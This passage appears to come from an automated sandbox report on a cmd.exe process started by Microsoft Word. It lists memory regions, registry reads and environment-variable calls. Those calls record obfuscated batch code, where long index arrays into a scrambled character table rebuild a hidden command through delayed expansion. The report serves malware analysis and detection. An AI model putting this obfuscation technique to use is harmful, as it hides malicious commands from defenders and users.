2,31,79,66,0,8,79,66,0,20,59,0,11,79,31,37,6,37,20,69,11,80,52,76,79,66,0,8,79,66,0,33,79,66,0,8,79,66,0,60,20,50,18,37,6,37,79,66,0,8,79,37,6,37,66,0,59,79,66,0,26,35,81,71,22,50,78,75,21,78,30,21,78,63,21,78,61,21,78,16,21,71,22,50,49,81,33,59,5,7,50,65,64,59,33,20,20,54,35,81,34,79,66,0,80,54,79,66,0,8,79,66,0,17,35,80,37,6,37,79,66,0,8,79,66,0,37,6,37,33,38,50,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,10,14,15,78,34,79,66,0,5,11,64,38,76,65,79,66,0,8,79,66,0,44,35,60,33,51,79,66,37,6,37,0,8,79,66,0,80,0,79,66,0,81,26,35,81,71,22,50,78,63,21,78,61,21,78,37,6,37,16,21,71,22,50,49,31,9,78,80,21,29,52,44,21,81,34,63,81,5,33,35,81,34,37,6,37,79,66,0,76,65,44,35,60,79,66,0,8,79,66,0,11,37,6,37,64,38,79,66,0,8,79,66,0,80,0,5,79,66,0,37,6,37,8,79,66,0,33,51,79,66,0,26,35,81,37,6,37,71,22,50,78,16,21,78,37,6,37,61,21,78,75,21,78,63,21,71,22,50,49,81,34,79,66,0,59,79,66,0,8,79,66,0,73,72,79,66,0,81,26,35,81,71,22,50,78,16,21,78,63,21,71,22,50,49,10,14,49,81,26,76,15,37,6,37,81,34,79,66,0,60,47,33,79,66,0,8,79,66,0,60,5,79,66,0,8,79,66,0,54,17,5,79,66,0,8,79,66,0,42,37,6,37,13,2,79,37,6,37,79,66,0,8,79,66,0,17,31,18,59,0,11,26,31,18,12,11,45,7,76,69,31,59,33,79,66,0,37,6,37,8,79,66,0,80,79,66,0,8,79,66,0,17,20,68,20,79,66,0,26,35,71,22,50,78,40,21,78,75,21,78,30,21,78,16,21,78,37,6,37,36,21,78,61,21,78,63,21,71,22,50,49,55,33,66,68,17,25,81,81,9,81,27,54,13,74,46,41,29,52,44,81,81,37,6,37,15,81,34,79,66,0,65,44,31,18,79,66,0,8,79,66,0,59,13,11,79,66,0,8,79,66,0,45,79,66,0,8,79,66,0,26,79,66,0,8,79,66,0,0,5,11,79,66,0,8,79,66,0,69,31,42,70,17,18,79,66,0,8,79,66,0,64,66,46,79,66,0,8,79,66,0,20,79,66,0,8,79,66,0,68,79,66,0,8,79,66,0,31,20,12,11,45,52,46,79,66,0,79,35,71,22,50,78,32,21,78,40,21,78,75,21,78,67,21,78,53,37,6,37,21,78,36,21,78,37,6,37,63,21,78,30,21,78,16,21,78,61,21,71,22,50,49,55,33,66,68,17,25,81,9,67,17,30,61,37,6,37,71,29,52,44,81,81,15,34,79,66,0,60,79,66,0,37,6,37,8,79,66,0,54,33,0,74,17,79,66,0,8,79,66,0,31,51,7,76,45,79,66,0,8,79,66,0,80,54,79,66,0,8,79,37,6,37,66,0,70,0,58,79,66,0,26,35,71,22,37,6,37,50,78,16,21,78,63,21,78,30,21,78,61,21,78,75,21,71 |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:38, Reason: Child Process |
| Unmonitor | End Time: 00:01:21, Reason: Self Terminated |
| Monitor Duration | 00:00:43 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xacc |
| Parent PID | 0x91c (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AD0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00156fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00260000 | 0x002c6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00597fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x00720fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x01b2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b30000 | 0x01b30000 | 0x01e72fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x4a470000 | 0x4a4c8fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee6150000 | 0x7fee6157fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0xad0
21374
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-11-14 09:19:29 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 106501 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x4a470000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\Cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 | |
| Environment | Get Environment String | name = 4 in (38,2,12,70,0,18,74,70,48,48,81,81,35,7,2,38,81,35,12,81,16,81,81,81,24,81,14,81,49,81,1,66,18,58,11,59,33,25,30,55,6,1,38,18,58,2,59,33,25,75,63,55,6,37,19,37,34,81,49,81,49,35,57,2,76,52,25,13,70,72,70,19,55,28,28,59,5,17,73,74,70,20,49,4,24,81,34,81,34,67,75,55,13,5,74,73,25,8,37,79,66,0,37,81,33,44,5,48,66,33,0,73,35,36,67,55,13,5,74,73,25,8,37,62,73,38,37,81,81,33,44,5,48,66,33,0,73,35,81,81,36,75,55,13,5,74,73,25,8,37,29,52,44,37,81,33,44,5,48,66,33,0,73,35,81,81,30,75,55,13,5,74,73,25,8,37,71,22,50,37,81,81,33,44,5,48,66,33,0,73,35,34,37,34,78,80,21,29,52,44,49,34,79,66,0,33,76,79,66,0,8,79,66,0,47,79,66,0,26,35,81,71,22,50,78,63,21,78,16,21,71,22,50,49,31,15,34,78,71,22,50,60,19,62,73,38,70,17,71,22,50,31,78,62,62,73,38,60,21,29,52,44,9,78,80,21,29,52,44,37,6,37,15,71,22,50,60,47,33,62,73,38,17,71,22,50,31,78,37,6,37,62,62,73,38,60,21,29,52,44,15,34,49,33,43,11,77,52,46,31,34,79,66,0,33,60,20,5,79,66,0,8,79,66,0,66,79,66,0,26,35,37,6,37,71,22,50,78,16,21,78,63,21,71,22,50,49,31,78,64,17,21,37,6,37,29,52,44,15,78,70,22,13,62,73,38,17,21,29,52,44,81,37,6,37,9,81,71,22,50,33,7,46,62,73,38,65,62,73,38,76,60,48,22,42,71,22,50,31,78,62,62,73,38,60,21,29,52,44,15,34,79,66,0,33,60,20,50,79,66,0,8,79,66,0,18,37,6,37,79,66,0,8,79,66,0,20,59,0,11,79,79,66,0,8,79,66,0,31,20,69,11,80,52,76,12,31,59,79,66,0,8,79,66,0,47,11,62,79,66,0,8,79,66,37,6,37,0,60,47,33,17,31,79,66,0,26,37,6,37,35,81,71,22,50,78,16,21,78,63,21,78,75,21,78,61,21,78,40,21,78,30,21,71,22,50,49,81,34,79,66,0,60,73,79,66,0,8,79,66,0,7,79,66,0,8,79,66,0,33,71,64,2,35,69,33,79,66,0,26,35,81,71,22,50,78,61,21,78,63,21,78,16,21,71,22,50,49,10,14,81,9,81,78,62,62,73,38,60,21,29,52,44,21,81,33,20,65,33,81,78,34,71,22,50,60,47,62,73,38,33,17,62,73,38,33,80,2,73,46,7,37,6,37,22,71,22,50,28,28,3,54,0,58,46,41,29,52,44,81,49,37,6,37,71,22,50,60,47,33,62,73,38,17,60,70,72,71,22,50,28,28,70,22,48,54,39,31,34,81,81,34,79,66,0,67,79,66,0,37,6,37,6,79,66,0,17,30,61,57,79,66,0,49,81,81,34,79,37,6,37,66,0,54,39,79,66,0,8,79,66,0,70,48,62,5,46,0,79,66,0,81,26,35,71,22,50,78,63,21,78,16,21,71,22,50,49,31,81,81,49,81,81,9,78,45,21,29,52,44,21,81,34,79,66,0,54,17,18,79,66,0,81,3,33,35,81,34,49,33,43,11,77,52,46,31,34,79,66,0,18,37,6,37,11,17,79,66,0,8,79,66,0,0,60,79,66,0,8,79,66,0,72,52,76,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,31,71,22,50,33,60,54,62,73,38,17,62,73,38,18,60,52,70,59,17,13,54,62,73,38,66,54,71,22,50,31,71,22,50,80,54,62,73,38,70,0,58,17,60,7,62,73,38,70,62,73,38,0,13,22,73,71,22,50,28,37,6,37,28,70,56,65,5,39,31,34,81,34,79,66,0,56,79,66,0,6,79,66,0,19,18,79,66,0,6,79,66,0,28,33,37,6,37,65,79,66,0,37,6,37,6,79,66,0,64,5,46,0,5,39,79,66,0,49,81,34,79,66,0,33,51,79,66,0,37,6,37,8,79,66,0,35,17,79,66,0,8,79,66,0,42,70,60,76,79,66,0,81,26,35,71,22,50,78,63,21,37,6,37,78,16,21,78,61,21,71,22,50,49,31,81,49,81,81,49,81,26,76,49,29,52,44,15,34,79,66,0,12,31,79,66,0,8,79,66,0,20,59,0,11,79,31,37,6,37,20,69,11,80,52,76,79,66,0,8,79,66,0,33,79,66,0,8,79,66,0,60,20,50,18,37,6,37,79,66,0,8,79,37,6,37,66,0,59,79,66,0,26,35,81,71,22,50,78,75,21,78,30,21,78,63,21,78,61,21,78,16,21,71,22,50,49,81,33,59,5,7,50,65,64,59,33,20,20,54,35,81,34,79,66,0,80,54,79,66,0,8,79,66,0,17,35,80,37,6,37,79,66,0,8,79,66,0,37,6,37,33,38,50,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,10,14,15,78,34,79,66,0,5,11,64,38,76,65,79,66,0,8,79,66,0,44,35,60,33,51,79,66,37,6,37,0,8,79,66,0,80,0,79,66,0,81,26,35,81,71,22,50,78,63,21,78,61,21,78,37,6,37,16,21,71,22,50,49,31,9,78,80,21,29,52,44,21,81,34,63,81,5,33,35,81,34,37,6,37,79,66,0,76,65,44,35,60,79,66,0,8,79,66,0,11,37,6,37,64,38,79,66,0,8,79,66,0,80,0,5,79,66,0,37,6,37,8,79,66,0,33,51,79,66,0,26,35,81,37,6,37,71,22,50,78,16,21,78,37,6,37,61,21,78,75,21,78,63,21,71,22,50,49,81,34,79,66,0,59,79,66,0,8,79,66,0,73,72,79,66,0,81,26,35,81,71,22,50,78,16,21,78,63,21,71,22,50,49,10,14,49,81,26,76,15,37,6,37,81,34,79,66,0,60,47,33,79,66,0,8,79,66,0,60,5,79,66,0,8,79,66,0,54,17,5,79,66,0,8,79,66,0,42,37,6,37,13,2,79,37,6,37,79,66,0,8,79,66,0,17,31,18,59,0,11,26,31,18,12,11,45,7,76,69,31,59,33,79,66,0,37,6,37,8,79,66,0,80,79,66,0,8,79,66,0,17,20,68,20,79,66,0,26,35,71,22,50,78,40,21,78,75,21,78,30,21,78,16,21,78,37,6,37,36,21,78,61,21,78,63,21,71,22,50,49,55,33,66,68,17,25,81,81,9,81,27,54,13,74,46,41,29,52,44,81,81,37,6,37,15,81,34,79,66,0,65,44,31,18,79,66,0,8,79,66,0,59,13,11,79,66,0,8,79,66,0,45,79,66,0,8,79,66,0,26,79,66,0,8,79,66,0,0,5,11,79,66,0,8,79,66,0,69,31,42,70,17,18,79,66,0,8,79,66,0,64,66,46,79,66,0,8,79,66,0,20,79,66,0,8,79,66,0,68,79,66,0,8,79,66,0,31,20,12,11,45,52,46,79,66,0,79,35,71,22,50,78,32,21,78,40,21,78,75,21,78,67,21,78,53,37,6,37,21,78,36,21,78,37,6,37,63,21,78,30,21,78,16,21,78,61,21,71,22,50,49,55,33,66,68,17,25,81,9,67,17,30,61,37,6,37,71,29,52,44,81,81,15,34,79,66,0,60,79,66,0,37,6,37,8,79,66,0,54,33,0,74,17,79,66,0,8,79,66,0,31,51,7,76,45,79,66,0,8,79,66,0,80,54,79,66,0,8,79,37,6,37,66,0,70,0,58,79,66,0,26,35,71,22,37,6,37,50,78,16,21,78,63,21,78,30,21,78,61,21,78,75,21,71,22,50,49,37,6,37,55,33,38,50,60,25,81,81,9,81,22,19,20,29,52,44,37,6,37,81,37,49,49,81,49,81,34,37,47,37,6,55,30,7 |
|
1 | |
| Environment | Get Environment String | name = 4,1!&&if |
|
1 | |
| Environment | Get Environment String | name = 4 geq 83 cmd.exe /C!tGCX |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 24 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!p |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pO |
|
